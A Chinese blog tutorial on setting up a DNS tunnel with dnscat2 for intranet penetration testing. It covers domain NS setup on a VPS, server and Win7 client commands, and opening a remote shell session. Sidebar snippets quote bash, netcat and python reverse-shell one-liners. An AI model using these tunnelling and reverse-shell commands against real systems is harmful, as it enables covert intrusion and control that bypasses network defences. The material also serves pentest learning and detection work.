内网之dns隧道及小注意点

最新推荐文章于 2023-09-10 07:00:00 发布
最新推荐文章于 2023-09-10 07:00:00 发布
阅读量2.8k 收藏 1
点赞数
文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/D_Dwjh/article/details/121589946
版权

DNS隧道的话,需要一个公网vps,一个域名。
DNS的基础知识可以在b站找到资料,就不过多阐述了。

先设置域名解析,为了后面的中继做准备,这里解释一下,中继的过程需要有一个域名服务器的,我们使用ns解析,指定一个域名服务器,此服务器还是我们自己的vps,ns只能设置子域名!
在这里插入图片描述
验证配置是否正确
1.验证第一个A记录是否解析正确:
在这里插入图片描述
2.验证第二个ns解析是否正确,这里说一下,虽然我们把index的vps作为域名服务器,但是他实际上没有解析域名的功能,所以需要在vps上抓包查看:

在这里插入图片描述

主要说明利用dnscat2进行隧道搭建获取shell

有个小注意点,如果使用中继模式,尽量不要用动态获取的dns服务器,最好指定8.8.8.8等。因为如果用默认的dns服务器的话,会导致迭代查询过慢,然后直接挂了,如下图所示:
在这里插入图片描述
中继模式:

vps:ruby ./dnscat2.rb 域名 -e open -c 密码 --no-cache

在这里插入图片描述
win7测试连通性:dnscat2-v0.07-client-win32.exe --ping 域名
出现第二个红框表示成功。
在这里插入图片描述
win7连接dnscat2服务端:dnscat2-v0.07-client-win32.exe --dns domain=域名 --secret 密码

查看vps,发现有session建立了:
在这里插入图片描述
这里查看session,window可以用windows或者sessions
进入session的话用命令:session -i 会话号
shell是进入交互界面,然后会创建一个新的session,进入即可交互。
在这里插入图片描述
中继模式到此结束。

直连模式:

vps:ruby ./dnscat2.rb --dns "domain=localhost,port=53" --secret 密码 --no-cache

在这里插入图片描述
win7连接dnscat2服务器:dnscat2-v0.07-client-win32.exe --dns server=42.192.3.9 --secret 密码
在这里插入图片描述
查看vps服务器:
在这里插入图片描述
工具地址:
1.dnscat2:https://github.com/iagox86/dnscat2
2.win客户端(编译好的,当然也可以自己编译),密码是 (password):https://downloads.skullsecurity.org/dnscat2/
3.dns基础知识,去b站看吧,很多的。

简H
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dns隧道攻击分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-20 1035
DNS隧道是隐蔽信道的一种,通过将其他协议封装在DNS协议中传输建立通信。因为在我们的网络世界中DNS是一个必不可少的服务,所以大部分防火墙和入侵检测设备很少会过滤DNS流量,这就给dns隧道攻击作为一种隐蔽信道提供了条件,从而可以利用它实现诸如远程控制,文件传输等操作,现在越来越多的研究证明dns隧道攻击也经常在僵尸网络和APT攻击中扮演着重要的角色。 一、dns隧道攻击演练:dnscat2 攻击机(kali):192.168.137.134 靶机(centos):192.168.137.1
内网渗透综合实验.docx
08-29
本文档主要讲解了内网渗透综合实验的相关知识,包括内网通信、隧道通信、Powercat 和 nc 反弹 shell、DNS 隧道、ssh 隧道等。 一、内网通信 内网通信是指在局域网内部的计算机之间进行数据交换的过程。在本实验...
msf反弹php shell,反弹shell总结
weixin_42502419的博客
03-22 468
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
渗透测试笔记】之【内网渗透——应用层隧道DNS隧道dnscat2的使用(域名连接、直连、powershell连接))】
AA8j的博客
10-26 2152
文章目录1 服务器端环境部署1.1 部署域名解析1.1.1 创建A记录1.1.2 创建NS记录1.2 安装dnscat2服务器1.3 启动服务器1.3.1 域名连接方式1.3.2 直连方式2 客户端部署2.1 安装dnscat2客户端2.2 连接服务器2.2.1 访问测试及错误处理2.2.2 域名连接方式2.2.3 直连方式2.3 服务端常用命令2.3.1 获取一个shell2.3.2 打开一个程序 1 服务器端环境部署 1.1 部署域名解析 如果要通过域名的方式访问那么久必须部署域名解析,直连方式则跳过此
一文读懂DNS隧道
FreeBuf_的博客
12-02 3254
此篇文章为了读者看起来更加清楚,公网服务器与域名都是未打码的,希望各位大佬手下留情。
内网隐藏通信隧道技术——DNS隧道
A_991128a的博客
08-01 1157
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
APT实践分享:基于机器学习的隐蔽信道检测从0-_1.pdf
08-08
企业内网环境中,DNS协议是必不可少的网络通信协议之一,网络设备和边界防护设备在一般的情况下很少对DNS进行过滤分析或屏蔽,因此将数据或指令藏匿于DNS协议中进行传输是一种隐蔽且有效的手段。这类手段常用于APT中...
流量代理之reGeorg内网穿透工具包.zip
01-13
关于通过reGeorg建立HTTP隧道的作用体现在,当我们能通过外网访问服务器A,但是我们并不能与位于内网的主机交互,这时reGeorg就派上了用场,假设此时我们拿到了服务器A的webshell,但是该内网主机的icmp、DNS、tcp和...
使用反向ssh从外网访问内网主机的方法详解
09-15
这种方法主要通过建立反向SSH隧道,使得外网主机能够通过内网主机连接到的有固定外网IP的服务器,进而访问内网主机。 反向SSH的工作原理是,内网主机主动连接到有外网IP的服务器,并开放一个端口(如1111),这个...
dnscat2.zip
05-17
dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell……
DNS隧道
swordheart的博客
01-24 5009
DNS隧道 原理说明 DNS隧道是一种隐秘隧道,通过将其他协议封装到DNS协议中传输建立通信的方式。因为DNS协议在网络中一种基础必不可少的服务,所以大部分防火墙和入侵检测设备是不会对对DNS流量进行拦截过滤,这就给DNS作为隐蔽通信提供了有力条件,从而可以利用它实现诸如僵尸网络或木马的远程控制通道和对外传输数据等。 DNS隧道运营的原理可以归结为:“如果你不知道,请问别人”。当DNS服务器收到要解析的地址的DNS请求时,服务器开始在其数据库中查找。如果没有找到记录,则服务器向数据库中指定的域发送请求
什么是 DNS 隧道以及如何检测和防止攻击
最新发布
网络研究观
09-10 8345
DNS 隧道攻击利用 DNS 协议通过客户端-服务器模型来隧道恶意软件和其他数据。
DNS协议隧道(1)
分享学习网络的点点滴滴
09-29 632
windows 2008:安装DNS服务,配置转发器,创建区域lab.com;指派二级域test.lab.com,NS记录指向kali防火墙:只允许出站UDP 53端口流量Ubuntu:安装dns2tcp、wireshark、firefox。
DNS隧道流量分析
蚁景网安学院
06-01 1042
选择哪家的云都没问题,国内云需要实名,不建议使用,这里我选择的TX云,因为之前注册过了,自己拿来做个流量分析不成问题。
DNS隧道攻击
weixin_43493709的博客
07-22 953
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值